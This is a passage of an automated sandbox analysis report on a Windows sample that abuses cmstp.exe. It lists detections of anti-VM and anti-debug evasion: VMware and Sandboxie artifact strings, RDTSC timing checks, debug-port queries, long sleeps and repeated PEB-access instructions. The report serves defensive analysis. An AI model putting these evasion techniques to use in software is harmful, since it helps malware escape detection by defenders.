          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 20210113432.exe PID: 1476, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\20210113432.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000008498E4 second address: 00000000008498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000849B4E second address: 0000000000849B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\20210113432.exe TID: 4360Thread sleep time: -52304s >= -30000s
          Source: C:\Users\user\Desktop\20210113432.exe TID: 1416Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6680Thread sleep count: 51 > 30
          Source: C:\Windows\explorer.exe TID: 6680Thread sleep time: -102000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5296Thread sleep time: -110000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000003.00000000.268046635.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000002.623832514.00000000069DE000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\20210113432.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\20210113432.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040ACC0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0498A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04927D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04943D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04948EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04923A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04938E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04918A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04944A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04944A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04994257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]
